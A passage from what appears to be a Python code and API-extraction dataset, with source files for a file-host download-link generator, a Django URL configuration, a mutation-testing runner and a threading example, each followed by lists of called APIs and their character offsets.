data = json.loads(result)
except json.decoder.JSONDecodeError:
raise DirectDownloadLinkException("`Error: Can't extract the link`\n")
dl_url = data['download']
return dl_url
def mediafire(url: str) -> str:
""" MediaFire direct links generator """
try:
link = re.findall(r'\bhttps?://.*mediafire\.com\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No MediaFire links found`\n")
page = BeautifulSoup(requests.get(link).content, 'lxml')
info = page.find('a', {'aria-label': 'Download file'})
dl_url = info.get('href')
return dl_url
def osdn(url: str) -> str:
""" OSDN direct links generator """
osdn_link = 'https://osdn.net'
try:
link = re.findall(r'\bhttps?://.*osdn\.net\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No OSDN links found`\n")
page = BeautifulSoup(
requests.get(link, allow_redirects=True).content, 'lxml')
info = page.find('a', {'class': 'mirror_link'})
link = urllib.parse.unquote(osdn_link + info['href'])
mirrors = page.find('form', {'id': 'mirror-select-form'}).findAll('tr')
urls = []
for data in mirrors[1:]:
mirror = data.find('input')['value']
urls.append(re.sub(r'm=(.*)&f', f'm={mirror}&f', link))
return urls[0]
def github(url: str) -> str:
""" GitHub direct links generator """
try:
re.findall(r'\bhttps?://.*github\.com.*releases\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No GitHub Releases links found`\n")
download = requests.get(url, stream=True, allow_redirects=False)
try:
dl_url = download.headers["location"]
return dl_url
except KeyError:
raise DirectDownloadLinkException("`Error: Can't extract the link`\n")
def useragent():
"""
useragent random setter
"""
useragents = BeautifulSoup(
requests.get(
'https://developers.whatismybrowser.com/'
'useragents/explore/operating_system_name/android/').content,
'lxml').findAll('td', {'class': 'useragent'})
user_agent = choice(useragents)
return user_agent.text
|
[
"json.loads",
"bot.helper.ext_utils.exceptions.DirectDownloadLinkException",
"requests.Session",
"os.popen",
"random.choice",
"re.findall",
"requests.get",
"bs4.BeautifulSoup",
"re.search",
"re.sub"
] |
[((1210, 1228), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1226, 1228), False, 'import requests\n'), ((1334, 1373), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""lxml"""'], {}), "(response.content, 'lxml')\n", (1347, 1373), False, 'from bs4 import BeautifulSoup\n'), ((4758, 4811), 'requests.get', 'requests.get', (['url'], {'stream': '(True)', 'allow_redirects': '(False)'}), '(url, stream=True, allow_redirects=False)\n', (4770, 4811), False, 'import requests\n'), ((5322, 5340), 'random.choice', 'choice', (['useragents'], {}), '(useragents)\n', (5328, 5340), False, 'from random import choice\n'), ((334, 382), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No links found!`"""'], {}), "('`No links found!`')\n", (361, 382), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3118, 3136), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (3128, 3136), False, 'import json\n'), ((1040, 1093), 're.findall', 're.findall', (['"""\\\\bhttps?://.*zippyshare\\\\.com\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*zippyshare\\\\.com\\\\S+', url)\n", (1050, 1093), False, 'import re\n'), ((1134, 1194), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No ZippyShare links found`\n"""'], {}), "('`No ZippyShare links found`\\n')\n", (1161, 1194), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((1245, 1274), 're.search', 're.search', (['"""http.+.com"""', 'link'], {}), "('http.+.com', link)\n", (1254, 1274), False, 'import re\n'), ((2173, 2219), 're.findall', 're.findall', (['"""\\\\bhttps?://.*yadi\\\\.sk\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*yadi\\\\.sk\\\\S+', url)\n", (2183, 2219), False, 'import re\n'), ((2541, 2627), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: File not found / Download limit reached`\n"""'], {}), "(\n '`Error: File not found / Download limit reached`\\n')\n", (2568, 2627), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((2808, 2862), 're.findall', 're.findall', (['"""\\\\bhttps?://.*cloud\\\\.mail\\\\.ru\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*cloud\\\\.mail\\\\.ru\\\\S+', url)\n", (2818, 2862), False, 'import re\n'), ((2902, 2965), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No cloud.mail.ru links found`\n"""'], {}), "('`No cloud.mail.ru links found`\\n')\n", (2929, 2965), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3032, 3046), 'os.popen', 'popen', (['command'], {}), '(command)\n', (3037, 3046), False, 'from os import popen\n'), ((3194, 3258), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: Can\'t extract the link`\n"""'], {}), '("`Error: Can\'t extract the link`\\n")\n', (3221, 3258), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3418, 3470), 're.findall', 're.findall', (['"""\\\\bhttps?://.*mediafire\\\\.com\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*mediafire\\\\.com\\\\S+', url)\n", (3428, 3470), False, 'import re\n'), ((3511, 3570), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No MediaFire links found`\n"""'], {}), "('`No MediaFire links found`\\n')\n", (3538, 3570), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3597, 3615), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (3609, 3615), False, 'import requests\n'), ((3878, 3925), 're.findall', 're.findall', (['"""\\\\bhttps?://.*osdn\\\\.net\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*osdn\\\\.net\\\\S+', url)\n", (3888, 3925), False, 'import re\n'), ((3966, 4020), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No OSDN links found`\n"""'], {}), "('`No OSDN links found`\\n')\n", (3993, 4020), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((4057, 4097), 'requests.get', 'requests.get', (['link'], {'allow_redirects': '(True)'}), '(link, allow_redirects=True)\n', (4069, 4097), False, 'import requests\n'), ((4416, 4457), 're.sub', 're.sub', (['"""m=(.*)&f"""', 'f"""m={mirror}&f"""', 'link'], {}), "('m=(.*)&f', f'm={mirror}&f', link)\n", (4422, 4457), False, 'import re\n'), ((4576, 4635), 're.findall', 're.findall', (['"""\\\\bhttps?://.*github\\\\.com.*releases\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*github\\\\.com.*releases\\\\S+', url)\n", (4586, 4635), False, 'import re\n'), ((4676, 4741), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No GitHub Releases links found`\n"""'], {}), "('`No GitHub Releases links found`\\n')\n", (4703, 4741), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((4929, 4993), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: Can\'t extract the link`\n"""'], {}), '("`Error: Can\'t extract the link`\\n")\n', (4956, 4993), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((1555, 1627), 're.search', 're.search', (['"""= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);"""', 'script.text'], {}), '(\'= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);\', script.text)\n', (1564, 1627), False, 'import re\n'), ((1690, 1762), 're.search', 're.search', (['"""= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);"""', 'script.text'], {}), '(\'= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);\', script.text)\n', (1699, 1762), False, 'import re\n'), ((5105, 5219), 'requests.get', 'requests.get', (['"""https://developers.whatismybrowser.com/useragents/explore/operating_system_name/android/"""'], {}), "(\n 'https://developers.whatismybrowser.com/useragents/explore/operating_system_name/android/'\n )\n", (5117, 5219), False, 'import requests\n'), ((790, 862), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['f"""No Direct link function found for {link}"""'], {}), "(f'No Direct link function found for {link}')\n", (817, 862), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n')]
|
from rest_framework.routers import DefaultRouter
from django.urls import path,include,re_path
from . import views
from .views import UserProfileViewSet,accountView,loginView,registerView
router = DefaultRouter()
router.register('profiles',UserProfileViewSet,base_name='user-profile-viewset')
urlpatterns = [
path('',include(router.urls)),
path('user/',accountView,name='account_email_verification_sent'),
path('login/',loginView,name='account_login'),
path('register/',registerView,name='account_signup'),
#re_path(r'email_exists/(?P<data>\w+|[\w.%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4})$',views.email_exists,name="email_exists"),
path('email_exists/<str:email>/',views.email_exists, name="email_exists"),
path('forgot_password/',views.forgot_password, name="forgot_password"),
path('change/',views.change, name="change"),
]
|
[
"django.urls.path",
"rest_framework.routers.DefaultRouter",
"django.urls.include"
] |
[((197, 212), 'rest_framework.routers.DefaultRouter', 'DefaultRouter', ([], {}), '()\n', (210, 212), False, 'from rest_framework.routers import DefaultRouter\n'), ((349, 415), 'django.urls.path', 'path', (['"""user/"""', 'accountView'], {'name': '"""account_email_verification_sent"""'}), "('user/', accountView, name='account_email_verification_sent')\n", (353, 415), False, 'from django.urls import path, include, re_path\n'), ((419, 466), 'django.urls.path', 'path', (['"""login/"""', 'loginView'], {'name': '"""account_login"""'}), "('login/', loginView, name='account_login')\n", (423, 466), False, 'from django.urls import path, include, re_path\n'), ((470, 524), 'django.urls.path', 'path', (['"""register/"""', 'registerView'], {'name': '"""account_signup"""'}), "('register/', registerView, name='account_signup')\n", (474, 524), False, 'from django.urls import path, include, re_path\n'), ((653, 727), 'django.urls.path', 'path', (['"""email_exists/<str:email>/"""', 'views.email_exists'], {'name': '"""email_exists"""'}), "('email_exists/<str:email>/', views.email_exists, name='email_exists')\n", (657, 727), False, 'from django.urls import path, include, re_path\n'), ((732, 803), 'django.urls.path', 'path', (['"""forgot_password/"""', 'views.forgot_password'], {'name': '"""forgot_password"""'}), "('forgot_password/', views.forgot_password, name='forgot_password')\n", (736, 803), False, 'from django.urls import path, include, re_path\n'), ((808, 852), 'django.urls.path', 'path', (['"""change/"""', 'views.change'], {'name': '"""change"""'}), "('change/', views.change, name='change')\n", (812, 852), False, 'from django.urls import path, include, re_path\n'), ((322, 342), 'django.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (329, 342), False, 'from django.urls import path, include, re_path\n')]
|
import argparse
import logging
import math
import time
from threading import Thread
from typing import List
import pandas as pd
from mutester.data_analysis import DataAnalysis
from mutester.data_crawler import DataCrawler
def analysis_thread(repository_path, environment_path, mutant_ids: List[int], results: List[DataAnalysis], timeout):
data_analysis = DataAnalysis(repository_path, environment_path, timeout)
data_analysis.collect_data(mutant_ids)
results.append(data_analysis)
# data_analysis.store_data_to_disk(args.filename, args.merge)
def store_data_to_disk(filename: str, merge: str, datas: List[DataAnalysis]):
mutants_and_tests = pd.DataFrame()
if merge != '':
mutants_and_tests = pd.read_pickle(merge)
print('Read in {} executions to merge from {}'.format(len(mutants_and_tests), merge))
for data_analysis in datas:
mutants_and_tests = mutants_and_tests.append(
data_analysis.mutants.set_index('mutant_id').join(data_analysis.executions.set_index('mutant_id'),
lsuffix='_mutant', rsuffix='_execution').reset_index(),
ignore_index=True,
)
timestring = time.strftime("%Y%m%d-%H%M%S")
pickle_name = timestring + '_' + filename + '.pkl'
mutants_and_tests.to_pickle(pickle_name)
print("Wrote: {}\n".format(pickle_name))
total_tests = len(mutants_and_tests)
print(mutants_and_tests)
total_failed_tests = len(mutants_and_tests[mutants_and_tests["outcome"] == False])
print('Total number of tests: {}\n Total failed number of tests: {}'.format(total_tests, total_failed_tests))
return pickle_name
def main():
argument_parser = argparse.ArgumentParser(
description='Run mutation testing with record of failed test to pandas dataframe'
)
argument_parser.add_argument('repository_path',
help='Path to the repository to be tested')
argument_parser.add_argument('environment_path',
help='Path to the python environment to run the tests. Make sure the module is '
'installed in -e mode, and that pytest, pytest-json, mutmut are available')
argument_parser.add_argument('interval_start',
help='Test to start with')
argument_parser.add_argument('interval_end',
help='Test to end with (exlusive)')
argument_parser.add_argument('-m', '--merge',
help='Add a path to the pickle file, the end result should be merged with.'
'Helpful if the process was aborted, and you want to run some tests again.',
default='')
argument_parser.add_argument('--filename', action='store', default='dataframe')
argument_parser.add_argument('-v', '--verbose', action='store_true')
argument_parser.add_argument('-j', '--thread_count', action='store', default=1)
argument_parser.add_argument('--timed_testruns', action='store', default=2,
help='Number of dry testruns to find out after which time the testsruns should be '
'aborted')
args = argument_parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
timed_run_count = int(args.timed_testruns)
timed_crawler = DataCrawler(args.repository_path, args.environment_path)
# TODO: Baseline runs only if pytest-json and pytest-timeout have been installed, which happens later
start_time = time.time()
for _ in range(timed_run_count):
timed_crawler.execute_test(-1)
test_baseline_time = math.ceil((time.time() - start_time) / timed_run_count)
logging.info('Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed',
test_baseline_time)
thread_count = int(args.thread_count)
threads = []
interval_start = int(args.interval_start)
interval_end = int(args.interval_end)
interval_length = int((interval_end - interval_start) / thread_count)
results = []
for thread_number in range(thread_count - 1):
thread_interval_start = interval_start + thread_number * interval_length
mutant_ids = list(range(thread_interval_start, thread_interval_start + interval_length))
threads.append(Thread(target=analysis_thread,
args=(args.repository_path, args.environment_path, mutant_ids, results,
test_baseline_time * 10)))
threads.append(Thread(target=analysis_thread,
args=(args.repository_path, args.environment_path,
list(range(interval_start + (thread_count - 1) * interval_length, interval_end)),
results, test_baseline_time * 10)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
store_data_to_disk(args.filename, args.merge, results)
return 0
if __name__ == "__main__":
exit(main())
|
[
"pandas.DataFrame",
"threading.Thread",
"argparse.ArgumentParser",
"logging.basicConfig",
"mutester.data_crawler.DataCrawler",
"time.strftime",
"time.time",
"logging.info",
"mutester.data_analysis.DataAnalysis",
"pandas.read_pickle"
] |
[((363, 419), 'mutester.data_analysis.DataAnalysis', 'DataAnalysis', (['repository_path', 'environment_path', 'timeout'], {}), '(repository_path, environment_path, timeout)\n', (375, 419), False, 'from mutester.data_analysis import DataAnalysis\n'), ((667, 681), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (679, 681), True, 'import pandas as pd\n'), ((1220, 1250), 'time.strftime', 'time.strftime', (['"""%Y%m%d-%H%M%S"""'], {}), "('%Y%m%d-%H%M%S')\n", (1233, 1250), False, 'import time\n'), ((1726, 1837), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run mutation testing with record of failed test to pandas dataframe"""'}), "(description=\n 'Run mutation testing with record of failed test to pandas dataframe')\n", (1749, 1837), False, 'import argparse\n'), ((3471, 3527), 'mutester.data_crawler.DataCrawler', 'DataCrawler', (['args.repository_path', 'args.environment_path'], {}), '(args.repository_path, args.environment_path)\n', (3482, 3527), False, 'from mutester.data_crawler import DataCrawler\n'), ((3652, 3663), 'time.time', 'time.time', ([], {}), '()\n', (3661, 3663), False, 'import time\n'), ((3825, 3965), 'logging.info', 'logging.info', (['"""Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed"""', 'test_baseline_time'], {}), '(\n """Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed"""\n , test_baseline_time)\n', (3837, 3965), False, 'import logging\n'), ((730, 751), 'pandas.read_pickle', 'pd.read_pickle', (['merge'], {}), '(merge)\n', (744, 751), True, 'import pandas as pd\n'), ((3363, 3402), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (3382, 3402), False, 'import logging\n'), ((4462, 4595), 'threading.Thread', 'Thread', ([], {'target': 'analysis_thread', 'args': '(args.repository_path, args.environment_path, mutant_ids, results, \n test_baseline_time * 10)'}), '(target=analysis_thread, args=(args.repository_path, args.\n environment_path, mutant_ids, results, test_baseline_time * 10))\n', (4468, 4595), False, 'from threading import Thread\n'), ((3776, 3787), 'time.time', 'time.time', ([], {}), '()\n', (3785, 3787), False, 'import time\n')]
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
print("start loop", idx, " at ", time.ctime())
def main():
print("Process start at ", time.ctime())
thread0 = Thread(target=loop, args=(0, 4))
thread0.start()
thread1 = Thread(target=loop, args=(1, 2))
thread1.start()
thread0.join()
thread1.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
[
"threading.Thread",
"time.ctime",
"time.sleep"
] |
[((141, 157), 'time.sleep', 'time.sleep', (['nsec'], {}), '(nsec)\n', (151, 157), False, 'import time\n'), ((281, 313), 'threading.Thread', 'Thread', ([], {'target': 'loop', 'args': '(0, 4)'}), '(target=loop, args=(0, 4))\n', (287, 313), False, 'from threading import Thread\n'), ((348, 380), 'threading.Thread', 'Thread', ([], {'target': 'loop', 'args': '(1, 2)'}), '(target=loop, args=(1, 2))\n', (354, 380), False, 'from threading import Thread\n'), ((123, 135), 'time.ctime', 'time.ctime', ([], {}), '()\n', (133, 135), False, 'import time\n'), ((195, 207), 'time.ctime', 'time.ctime', ([], {}), '()\n', (205, 207), False, 'import time\n'), ((253, 265), 'time.ctime', 'time.ctime', ([], {}), '()\n', (263, 265), False, 'import time\n'), ((470, 482), 'time.ctime', 'time.ctime', ([], {}), '()\n', (480, 482), False, 'import time\n')]
|